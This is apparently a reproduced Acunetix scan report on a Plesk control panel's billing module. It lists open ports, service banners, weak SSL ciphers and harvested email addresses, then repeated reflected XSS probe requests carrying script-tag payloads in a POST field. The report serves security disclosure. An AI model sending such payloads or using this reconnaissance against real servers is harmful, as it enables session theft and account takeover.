CVE-2011-4745, CVE-2011-4746, CVE-2011-4747, CVE-2009-3555, CVE-2011-4748, CVE-2011-4749, XSS, Cross Site Scripting in psa v10.3.1_build1013110726.09 os_RedHat el6, Billing Manager, CWE-79, CAPEC-86, DORK, GHDB


Loading
XSS.Cx Product Review

28 September, 2011
psa v10.3.1_build1013110726.09 os_RedHat el6, Billing System, Product Review, Report

Low Risk: Note that this report is with respect to a logged in user. (Admin, Reseller or User)

)
Scan of https://psa v10.3.1_build1013110726.09 os_RedHat el6:8443/
Scan details
Scan information
Starttime9/28/2011 9:42:40 AM
Finish time9/28/2011 12:56:22 PM
Scan time3 hours, 13 minutes
ProfileDefault
Server information
ResponsiveTrue
Server bannersw-cp-server
Server OSUnknown
Server technologies 
Threat level
Acunetix Threat Level 3
One or more high-severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these vulnerabilities and compromise the backend database and/or deface your website.
Alerts distribution
Total alerts found131
High79
 
Medium3
 
Low5
 
Informational44
 
Knowledge base
List of open TCP ports

Open Port 22 / ssh
Port Banner:
SSH-2.0-OpenSSH_5.3



Open Port 21 / ftp
Port Banner:
ProFTPD 1.3.3e Server (ProFTPD) [50.97.148.210]



Open Port 53 / domain
No port banner available.

Open Port 80 / http
Port Banner:
HTTP/1.1 200 OK: Wed, 28 Sep 2011 14:42:30 GMT: ApacheModified: Tue, 27 Sep 2011 22:21:15 GMT: "189495-263e-4adf3b1978cc0"Ranges: bytesLength: 9790Powered-By: PleskLin: closeType ...

Acunetix Website Audit2
Open Port 106 / pop3pw
Port Banner:
poppassd hello, who are you?



Open Port 110 / pop3
Port Banner:
+OK Hello there. <4372.1317220950@localhost.localdomain>



Open Port 143 / imap
Port Banner:
* OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA AUTH=CRAM-MD5 AUTH=PLAIN IDLE ACL ACL2=UNION STARTTLS] Courier-IMAP ready. Copyright 1998-2004 Double Precision, Inc. See COPYING for distributi ...


Open Port 443 / https
Port Banner:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />: You're speaking plain HTTP to an SSL ...


Open Port 465 / smtps
No port banner available.

Open Port 993 / imaps
No port banner available.

Open Port 995 / pop3s
No port banner available.

Open Port 3306 / mysql
Port Banner:
F
DNS server running
A DNS server is running on UDP port 53.
DNS server running on TCP
A DNS server is running on TCP port 53.
FTP server running
An FTP server is running on TCP port 21.
Whois lookup
Whois result for IP address 50.97.148.210:

% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf

% Note: this output has been filtered.
% To receive output for a database update, use the "-B" flag.

% Information related to '0.0.0.0 - 255.255.255.255'
: 0.0.0.0 - 255.255.255.255: IANA-BLK: The whole IPv4 address space: EU # Country is really world wide: ORG-IANA1-RIPEc: IANA1-RIPEc: IANA1-RIPE: ALLOCATED UNSPECIFIED: The country is really
Acunetix Website Audit3
worldwide.: This address space is assigned at various other places in: the world and might therefore not be in the RIPE database.by: RIPE-NCC-HM-MNTlower: RIPE-NCC-HM-MNTroutes: RIPE-NCC-RPSL-MNT: RIPE # Filtered
: ORG-IANA1-RIPEname: Internet Assigned Numbers Authoritytype: IANA: see http://www.iana.org: The IANA allocates IP addresses and AS number blocks to RIRs: see http://www.iana.org/ipaddress/ip-addresses.htm: and http://www.iana.org/assignments/as-numbersmail: bitbucket@ripe.netc: IANA1-RIPEc: IANA1-RIPEref: RIPE-NCC-HM-MNTby: RIPE-NCC-HM-MNT: RIPE # Filtered
: Internet Assigned Numbers Authority: see http://www.iana.org.mail: bitbucket@ripe.netc: IANA1-RIPEc: IANA1-RIPEhdl: IANA1-RIPE: For more information on IANA services: go to IANA web site at http://www.iana.org.by: RIPE-NCC-MNT: RIPE # Filtered



POP3 server running
A POP3 server is running on TCP port 110.
SSH server running
A SSH server is running on TCP port 22.
SSH server information:
Server key fingerprint: 49994da6e18d3495a0ff43b2b2adbb54 version: SSH2 algorithm client to server: AES128 CTR algorithm server to client: AES128 CTR algorithm client to server: HMAC with SHA-256 digest algorithm server to client: HMAC with SHA-256 digest key algorithm: Certificate is signed using RSA digital signature with MD2 digest
SSL server running [443]

A SSL2 server is running on TCP port 443.




SSL server information:

Version: SSL2,SSL3,TLS1


Certificate:

:
Country Name: US
State Or Province Name: Virginia
Locality Name: Herndon
Organization Name: Parallels
Organizational Unit Name: Parallels Panel
Common Name: Parallels Panel:
Country Name: US
State Or Province Name: Virginia
Locality Name: Herndon
Organization Name: Parallels
Organizational Unit Name: Parallels Panel
Common Name: Parallels Panel
version: 1 number: 4e824bd2 print: 3dc34a94fcaa2f679acee404f431c07f ID: 1.2.840.113549.1.1.5 start: Tue Sep 27 17:18:58 CDT 2011 end: Wed Sep 26 17:18:58 CDT 2012 in: 364 days



A SSL3 server is running on TCP port 443.


Acunetix Website Audit4

SSL server information:

Version: SSL2,SSL3,TLS1
Ciphers suported:
- SSL3_CK_RSA_RC4_40_MD5(OpenSSL ciphername: EXP-RC4-MD5, Protocol version: SSLv3, Key Exchange: RSA(512), Autentication: RSA, Symmetric encryption method: RC4(40), Message authentication code: MD5, export) - Low strength
- SSL3_CK_RSA_RC4_128_MD5(OpenSSL ciphername: RC4-MD5, Protocol version: SSLv3, Key Exchange: RSA, Autentication: RSA, Symmetric encryption method: RC4(128), Message authentication code: MD5) - High strength
- SSL3_CK_RSA_RC4_128_SHA(OpenSSL ciphername: RC4-SHA, Protocol version: SSLv3, Key Exchange: RSA, Autentication: RSA, Symmetric encryption method: RC4(128), Message authentication code: SHA1) - High strength
- SSL3_CK_RSA_RC2_40_MD5(OpenSSL ciphername: EXP-RC2-CBC-MD5, Protocol version: SSLv3, Key Exchange: RSA(512), Autentication: RSA, Symmetric encryption method: RC2(40), Message authentication code: MD5, export) - Low strength
- SSL3_CK_RSA_DES_40_CBC_SHA(OpenSSL ciphername: EXP-DES-CBC-SHA, Protocol version: SSLv3, Key Exchange: RSA(512), Autentication: RSA, Symmetric encryption method: DES(40), Message authentication code: SHA1, export) - Low strength
- SSL3_CK_RSA_DES_64_CBC_SHA(OpenSSL ciphername: DES-CBC-SHA, Protocol version: SSLv3, Key Exchange: RSA, Autentication: RSA, Symmetric encryption method: DES(56), Message authentication code: SHA1) - Low strength
- SSL3_CK_RSA_DES_192_CBC3_SHA(OpenSSL ciphername: DES-CBC3-SHA, Protocol version: SSLv3, Key Exchange: RSA, Autentication: RSA, Symmetric encryption method: 3DES(168), Message authentication code: SHA1) - High strength
- SSL3_CK_EDH_RSA_DES_40_CBC_SHA(OpenSSL ciphername: EXP-EDH-RSA-DES-CBC-SHA, Protocol version: SSLv3, Key Exchange: DH(512), Autentication: RSA, Symmetric encryption method: DES(40), Message authentication code: SHA1, export) - Low strength
- SSL3_CK_EDH_RSA_DES_64_CBC_SHA(OpenSSL ciphername: EDH-RSA-DES-CBC-SHA, Protocol version: SSLv3, Key Exchange: DH, Autentication: RSA, Symmetric encryption method: DES(56), Message authentication code: SHA1) - Low strength
- SSL3_CK_EDH_RSA_DES_192_CBC3_SHA(OpenSSL ciphername: EDH-RSA-DES-CBC3-SHA, Protocol version: SSLv3, Key Exchange: DH, Autentication: RSA, Symmetric encryption method: 3DES(168), Message authentication code: SHA1) - High strength



Certificate:

:
Country Name: US
State Or Province Name: Virginia
Locality Name: Herndon
Organization Name: Parallels
Organizational Unit Name: Parallels Panel
Common Name: Parallels Panel:
Country Name: US
State Or Province Name: Virginia
Locality Name: Herndon
Organization Name: Parallels
Organizational Unit Name: Parallels Panel
Common Name: Parallels Panel
version: 1 number: 4e824bd2 print: 3dc34a94fcaa2f679acee404f431c07f ID: 1.2.840.113549.1.1.5 start: Tue Sep 27 17:18:58 CDT 2011 end: Wed Sep 26 17:18:58 CDT 2012 in: 364 days



A TLS1 server is running on TCP port 443.




SSL server information:

Version: SSL2,SSL3,TLS1
Acunetix Website Audit5
Ciphers suported:
- TLS1_CK_RSA_EXPORT_WITH_RC4_40_MD5(OpenSSL ciphername: EXP-RC4-MD5, Protocol version: TLSv1, Key Exchange: RSA(512), Autentication: RSA, Symmetric encryption method: RC4(40), Message authentication code: MD5, export) - Low strength
- TLS1_CK_RSA_WITH_RC4_128_MD5(OpenSSL ciphername: RC4-MD5, Protocol version: TLSv1, Key Exchange: RSA, Autentication: RSA, Symmetric encryption method: RC4(128), Message authentication code: MD5) - High strength
- TLS1_CK_RSA_WITH_RC4_128_SHA(OpenSSL ciphername: RC4-SHA, Protocol version: TLSv1, Key Exchange: RSA, Autentication: RSA, Symmetric encryption method: RC4(128), Message authentication code: SHA1) - High strength
- TLS1_CK_RSA_EXPORT_WITH_RC2_CBC_40_MD5(OpenSSL ciphername: EXP-RC2-CBC-MD5, Protocol version: TLSv1, Key Exchange: RSA(512), Autentication: RSA, Symmetric encryption method: RC2(40), Message authentication code: MD5, export) - Low strength
- TLS1_CK_RSA_EXPORT_WITH_DES40_CBC_SHA(OpenSSL ciphername: EXP-DES-CBC-SHA, Protocol version: TLSv1, Key Exchange: RSA(512), Autentication: RSA, Symmetric encryption method: DES(40), Message authentication code: SHA1, export) - Low strength
- TLS1_CK_RSA_WITH_DES_CBC_SHA(OpenSSL ciphername: DES-CBC-SHA, Protocol version: TLSv1, Key Exchange: RSA, Autentication: RSA, Symmetric encryption method: DES(56), Message authentication code: SHA1) - Low strength
- TLS1_CK_RSA_WITH_3DES_EDE_CBC_SHA(OpenSSL ciphername: DES-CBC3-SHA, Protocol version: TLSv1, Key Exchange: RSA, Autentication: RSA, Symmetric encryption method: 3DES(168), Message authentication code: SHA1) - High strength
- TLS1_CK_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA(OpenSSL ciphername: EXP-EDH-RSA-DES-CBC-SHA, Protocol version: TLSv1, Key Exchange: DH(512), Autentication: RSA, Symmetric encryption method: DES(40), Message authentication code: SHA1, export) - Low strength
- TLS1_CK_DHE_RSA_WITH_DES_CBC_SHA(OpenSSL ciphername: EDH-RSA-DES-CBC-SHA, Protocol version: TLSv1, Key Exchange: DH, Autentication: RSA, Symmetric encryption method: DES(56), Message authentication code: SHA1) - Low strength
- TLS1_CK_DHE_RSA_WITH_3DES_EDE_CBC_SHA(OpenSSL ciphername: EDH-RSA-DES-CBC3-SHA, Protocol version: TLSv1, Key Exchange: DH, Autentication: RSA, Symmetric encryption method: 3DES(168), Message authentication code: SHA1) - High strength
- TLS1_CK_RSA_WITH_AES_128_CBC_SHA(OpenSSL ciphername: AES128-SHA, Protocol version: TLSv1, Key Exchange: RSA, Autentication: RSA, Symmetric encryption method: AES(128), Message authentication code: SHA1) - High strength
- TLS1_CK_DHE_RSA_WITH_AES_128_CBC_SHA(OpenSSL ciphername: DHE-RSA-AES128-SHA, Protocol version: TLSv1, Key Exchange: DH, Autentication: RSA, Symmetric encryption method: AES(128), Message authentication code: SHA1) - High strength
- TLS1_CK_RSA_WITH_AES_256_CBC_SHA(OpenSSL ciphername: AES256-SHA, Protocol version: TLSv1, Key Exchange: RSA, Autentication: RSA, Symmetric encryption method: AES(256), Message authentication code: SHA1) - High strength
- TLS1_CK_DHE_RSA_WITH_AES_256_CBC_SHA(OpenSSL ciphername: DHE-RSA-AES256-SHA, Protocol version: TLSv1, Key Exchange: DH, Autentication: RSA, Symmetric encryption method: AES(256), Message authentication code: SHA1) - High strength
- TLS1_CK_RSA_WITH_CAMELLIA_128_CBC_SHA(OpenSSL ciphername: n/a, Protocol version: TLSv1, Key Exchange: RSA, Autentication: RSA, Symmetric encryption method: Camellia(128), Message authentication code: SHA1) - High strength
- TLS1_CK_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA(OpenSSL ciphername: n/a, Protocol version: TLSv1, Key Exchange: DH, Autentication: RSA, Symmetric encryption method: Camellia(128), Message authentication code: SHA1) - High strength
- TLS1_CK_RSA_WITH_CAMELLIA_256_CBC_SHA(OpenSSL ciphername: n/a, Protocol version: TLSv1, Key Exchange: RSA, Autentication: RSA, Symmetric encryption method: Camellia(256), Message authentication code: SHA1) - High strength
- TLS1_CK_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA(OpenSSL ciphername: n/a, Protocol version: TLSv1, Key Exchange: DH, Autentication: RSA, Symmetric encryption method: Camellia(256), Message authentication code: SHA1) - High strength
- TLS1_CK_RSA_WITH_SEED_CBC_SHA(OpenSSL ciphername: n/a, Protocol version: TLSv1, Key Exchange: RSA, Autentication: RSA, Symmetric encryption method: SEED(128), Message authentication code: SHA1) - High strength
- TLS1_CK_DHE_RSA_WITH_SEED_CBC_SHA(OpenSSL ciphername: n/a, Protocol version: TLSv1, Key Exchange: DH, Autentication: RSA, Symmetric encryption method: SEED(128), Message authentication code: SHA1) - High strength



Certificate:

:
Country Name: US
State Or Province Name: Virginia
Acunetix Website Audit6
Locality Name: Herndon
Organization Name: Parallels
Organizational Unit Name: Parallels Panel
Common Name: Parallels Panel:
Country Name: US
State Or Province Name: Virginia
Locality Name: Herndon
Organization Name: Parallels
Organizational Unit Name: Parallels Panel
Common Name: Parallels Panel
version: 1 number: 4e824bd2 print: 3dc34a94fcaa2f679acee404f431c07f ID: 1.2.840.113549.1.1.5 start: Tue Sep 27 17:18:58 CDT 2011 end: Wed Sep 26 17:18:58 CDT 2012 in: 364 days

List of file extensions
File extensions can provide information on what technologies are being used on this website.
List of file extensions detected:


php3 => 4 file(s)
js => 30 file(s)
php => 6 file(s)
htc => 1 file(s)
ico => 3 file(s)
css => 35 file(s)
png => 96 file(s)
gif => 784 file(s)
jpg => 2 file(s)
html => 3 file(s)
aspx => 1 file(s)
jsp => 2 file(s)
asp => 1 file(s)
List of files with inputs
These files have at least one input (GET or POST).


/login.php3 - 1 inputs
/login_up.php3 - 2 inputs
/get_password.php - 1 inputs
/admin/reseller/list - 1 inputs
/admin/customer/list - 1 inputs
/admin/subscription/list - 1 inputs
/admin/subscription/login - 1 inputs
/plesk/admin-info - 1 inputs
/plesk-billing/admin/index.php/default - 7 inputs
/plesk-billing/admin/index.php/login.php - 1 inputs
/relay - 4 inputs
/sso/ui - 2 inputs
List of external hosts
These hosts were linked from this website but they were not scanned because they are not listed in the list of hosts allowed.(Settings->Scanners settings->Scanner->List of hosts allowed).


www.parallels.com
Uncommon HTTP responses
List of HTTP requests which resulted in an uncommon HTTP response (HTTP status code 500, the server returned no headers or didn't responded at all) .
Acunetix Website Audit7
2 HTTP responses were saved in the log file [a_open_http_anomalies]Logs\Http_Anomalies.txt[/a].
List of email addresses
List of all email addresses found on this host.


dstender@st-webdevelopment.de
info@moderngigabyte.com
L10n@modernbill.com
license@modernbill.com
sammi@oriontransfer.co.nz
stijink@googlemail.com
support@zapatec.com
wiley14@gmail.com
Alerts summary
 
Cross Site Scripting
AffectsVariations
/plesk-billing/admin/index.php/default78
 
 
SSL 2.0 deprecated protocol
AffectsVariations
Server1
 
 
SSL weak ciphers
AffectsVariations
Server2
 
 
TLS1/SSLv3 Renegotiation Vulnerability
AffectsVariations
Web Server1
 
 
Login page password-guessing attack
AffectsVariations
/plesk-billing/admin/index.php/default1
 
 
Possible sensitive directories
AffectsVariations
/admin1
/clients1
/filemanager1
/sessions1
 
 
Broken links
AffectsVariations
/a1
/clients1
/filemanager1
/sessions1
 
Acunetix Website Audit8
 
Email address found
AffectsVariations
/plesk-billing/js/ajax/core/ajax.inc.js1
/plesk-billing/js/cal/lang/calendar-en.js1
/plesk-billing/js/cal/src/calendar.js1
/plesk-billing/js/main.js1
/plesk-billing/js/scriptaculous/src/dragdrop.js1
 
 
GHDB: Plesk login page
AffectsVariations
/login.php31
/login.php3 (3374501a911b3c49b06bc10db6add2d8)1
/login.php3 (451975fe1c624b142875d023edec4ef6)1
/login.php3 (54ef8f7f96aac35b6e20e7ad66919986)1
/login.php3 (597ebff7038abda459ad504ef3df20fe)1
/login.php3 (850d2adcba8c50caed0abb2b8e5a6989)1
/login.php3 (a2585f3faf5a218b6c72e48bfa887b23)1
/login.php3 (ac2723753fac2b88686cb5b2bc6bbc22)1
/login.php3 (e15e2853c2c5206206ec59c0de1f5071)1
/login.php3 (e2244fb34780a6680aeb8eb9ff84b62e)1
/login.php3 (f185af52a903ff0b9fb5e2940dc0458e)1
 
 
Password type input with autocomplete enabled
AffectsVariations
/plesk-billing/admin/index.php/default (17dea874a4260c107340766eaffda035)1
/plesk-billing/admin/index.php/default (2e39a46f1a52b41b5047fa3cd1302a90)1
/plesk-billing/admin/index.php/default (513bab607d321b2e9132da27afe01b61)1
/plesk-billing/admin/index.php/default (5229546eabfab88f36ff003f01533b7e)1
/plesk-billing/admin/index.php/default (63c59334446a836aca8f6ed80baee5d1)1
/plesk-billing/admin/index.php/default (6a12a9239841d158904ee3b59f5492bb)1
/plesk-billing/admin/index.php/default (75c36bc2fd49ea42445effd46f006b1d)1
/plesk-billing/admin/index.php/default (7ebe774369a91911d541fb1db7083b26)1
/plesk-billing/admin/index.php/default (7f18521e4fd54c25e5c160de78e3bf58)1
/plesk-billing/admin/index.php/default (805c4e4036e72043f679e032841c410f)1
/plesk-billing/admin/index.php/default (89e67f4d28e68c617bcf1b654aac0e3e)1
/plesk-billing/admin/index.php/default (b4357d8348b6667918fe76f73bed5ec5)1
/plesk-billing/admin/index.php/default (b765568e1ea0af3bca9e78542209cdab)1
/plesk-billing/admin/index.php/default (b9d6c5c417318656b4d1924c03505eb5)1
/plesk-billing/admin/index.php/default (bb12bc9493fbfd257e3b9d5546305c55)1
/plesk-billing/admin/index.php/default (bf389218a1a7c819f912e3b8dea29d4f)1
/plesk-billing/admin/index.php/default (d304c57150d464d93a87e0a82dc39125)1
/plesk-billing/admin/index.php/default (da23cfed0c678bb49937c6587e831277)1
/plesk-billing/admin/index.php/default (db55880a016747fd67f1fecc4a176204)1
/plesk-billing/admin/index.php/default (e4847cd386b3cb94d8f77609247353bd)1
/plesk-billing/admin/index.php/default (eb0c525c637924396a0d69a151d9277f)1
/plesk-billing/admin/index.php/default (f8934c24010b6d2e55d5e1b95bfab975)1
/plesk-billing/admin/index.php/default (fca8ee49d7af78f79b1b0fcfd0d7bb4a)1
 
 
Possible username or password disclosure
AffectsVariations
/plesk-billing/js/jquery/jquery-1.5.2.min.js1
 
Acunetix Website Audit9
Alert details
Cross Site Scripting
 
SeverityHigh
TypeValidation
Reported by moduleScripting (XSS.script)
Description
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks.

Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.
Impact
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.
Recommendation
Your script should filter metacharacters from user input.
Affected items
/plesk-billing/admin/index.php/default
Details
URL encoded POST input message_id was set to '"()&%1<ScRiPt >prompt(926040)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 925
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...fQui48Jr7kWc7%2buki327nEsxhbugqa1obIABnOiBoam6vmrz24wfE4nkcysWxWdt42ZaSzMaCZzsXMm2IzQZKSeRx3bfSMb%2b3BxHjM63z9K%2fnKxpOhy7i4l%2buUl5uxrnnDRmPsmoLzPbotCIidZtMP1Aia3jOo9q2b%2b4eE53orVp0L3vL2V06G5hKkQpCkm6tBU5qo0lmRndWVnMd5I7UCyG%2f95K0MDr29sm%2f9%2bxBmXEjWMUUX3e0ZKHqzBa8uKklvjuYVeSF1J6EcRCVbFx%2bgvUdR22-793b72608099d2555312d5b39efab3a788f206a0&request_id=eo8l93kulathzgb1cv79uukndllhfhyh6c&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:20 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:21 GMT
Server: sw-cp-server
Content-Length: 153
/plesk-billing/admin/index.php/default
Details
URL encoded POST input message_id was set to '"()&%1<ScRiPt >prompt(979921)</ScRiPt>
Acunetix Website Audit10
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 934
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...R7ReiRSqH0qkwPRQRN%2fMOKZPNErl45LZNYSkyIUb%2bRFvmdZNX6ZXdByKyeGnVDHJCG3bLKsYgMTmbubJpJ1EmppRDgh3uGHYX1NjfaEIaTy89xXOPT7Z%2b6qeLrS%2fuFkpvem3MNJ6ggTbbg0CiyON2mqblvNZunTqYj5clnGOvKhtbbFzzvEHb%2buaHbdFKZJp1oVUpqH1LNjMsZ7CUriR1kJqN%2fLOXRCle3952%2bf8O1YNRN0lBBfisg2UHV2VQy81H1PTuYL3lrrR2yquZq2rf6C%2fWORs5-4eb0fde9b4cce264a406fc960f41760b3e6e8367&request_id=dzdzpqpoxjuq68gfyrbs9if1edllhfhwgk4&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:20 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:20 GMT
Server: sw-cp-server
Content-Length: 153
/plesk-billing/admin/index.php/default
Details
URL encoded POST input message_id was set to '"()&%1<ScRiPt >prompt(913848)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 936
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...Cizilrmx8cyqMzqkIhnAnRxKqblgSogAJf4QVcVTVvU6VX9hyLEWalhs6SjMn4nVEeNwlg8slsjozNUqVLCnikcgZyXK97OfRO7TT2f7%2ffrkXMuwng9bpdq3fSwVZPQerwMTE4r2bkrxBDb7WXaLq5n7dexl%2fPwZ%2fFTeGC1CZ1qbfuSpV2zOZ6N1kBEnEsZlvayu4ww%2fTJJg%2bkoUgayWdPfewgqeH1728f%2fd4ZOarZR9MzLT55jBLYyrQTN2JTAd2BNXjMTwjLH5hhlu4G%2f35cHgw%3d%3d-795d9b2610f8b020c630b61ea686337501b7027b&request_id=sv0q3uhszc35j7nquwacpsc1mdllhfjxlzl&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:21 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:21 GMT
Server: sw-cp-server
Content-Length: 153
/plesk-billing/admin/index.php/default
Details
URL encoded POST input message_id was set to '"()&%1<ScRiPt >prompt(940789)</ScRiPt>
Request
Acunetix Website Audit11
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 934
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...R7ReiRSqH0qkwPRQRN%2fMOKZPNErl45LZNYSkyIUb%2bRFvmdZNX6ZXdByKyeGnVDHJCG3bLKsYgMTmbubJpJ1EmppRDgh3uGHYX1NjfaEIaTy89xXOPT7Z%2b6qeLrS%2fuFkpvem3MNJ6ggTbbg0CiyON2mqblvNZunTqYj5clnGOvKhtbbFzzvEHb%2buaHbdFKZJp1oVUpqH1LNjMsZ7CUriR1kJqN%2fLOXRCle3952%2bf8O1YNRN0lBBfisg2UHV2VQy81H1PTuYL3lrrR2yquZq2rf6C%2fWORs5-4eb0fde9b4cce264a406fc960f41760b3e6e8367&request_id=woyy3afcety9cfp4ht2gzmqjidllhflglly&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:21 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:21 GMT
Server: sw-cp-server
Content-Length: 153
/plesk-billing/admin/index.php/default
Details
URL encoded POST input message_id was set to '"()&%1<ScRiPt >prompt(909024)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 928
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...ovhAtAiwKC356KANm%2f7qUTHZFLA5jWxZZccb5OT68r4qmLer0VsPHRIj6hYFZiQmN31yr4wxSBI9%2brtG3E68SUooijXU7zsbOaHfqm2m%2bXtDusL2GYdTg4doh1HJddwfnpNbTWXZwatiWBRKFuG6DafsY2Tqs06Dm%2fe%2fF38IBahN6bG37nEf75sWNmWjNmYy60EDKamMZzfTLTRlKh5I6CGYtfm0lXvHXt7dN%2fr9zdUrDiyAPXn3i2UYTV9AoRbYSJb2b2OToQUoLDuZYhY3UX%2fPuHPY%3d-36f5da45dea4db35181527932feb21b4522af8ff&request_id=kb6o8o1jup1xvat023q48obwudllhfk3hi9&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:21 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:21 GMT
Server: sw-cp-server
Content-Length: 153
/plesk-billing/admin/index.php/default
Details
URL encoded POST input message_id was set to '"()&%1<ScRiPt >prompt(920626)</ScRiPt>
Request
Acunetix Website Audit12
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 940
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...D2UUW3BHfIutji49Sq1be4qYACX9EBXFU1b1Pmt%2bg9ETMa5ETPySZmwx1UnjKJEnoJcUmBnqDJT3kGGHZKN87oOQ%2fDN%2fW7Upbk%2bHu%2f%2biOsxLMuyIl61ns5apu9F2udqYvsOFFFM03aWNgVLS79MPc7Dsw23eBS1iZ1qXfu0QbvmxY%2bbzhqYTLaUEXlHu8gkItgbGsoHkjtIzJr%2f2UtQwevb2%2b7%2b33161OKFUxABP%2bNOU3iL0EryLUIl6T28Zlu5kNIJL%2bZUFbuav9q5Fq4%3d-836aeca61f0d9cf54d9e8554b1dab0fee5bfdbb5&request_id=xegaz4qhrmgkat9654pnylmtjdllhfhwcbo&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:20 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:20 GMT
Server: sw-cp-server
Content-Length: 153
/plesk-billing/admin/index.php/default
Details
URL encoded POST input message_id was set to '"()&%1<ScRiPt >prompt(955276)</ScRiPt>
Request
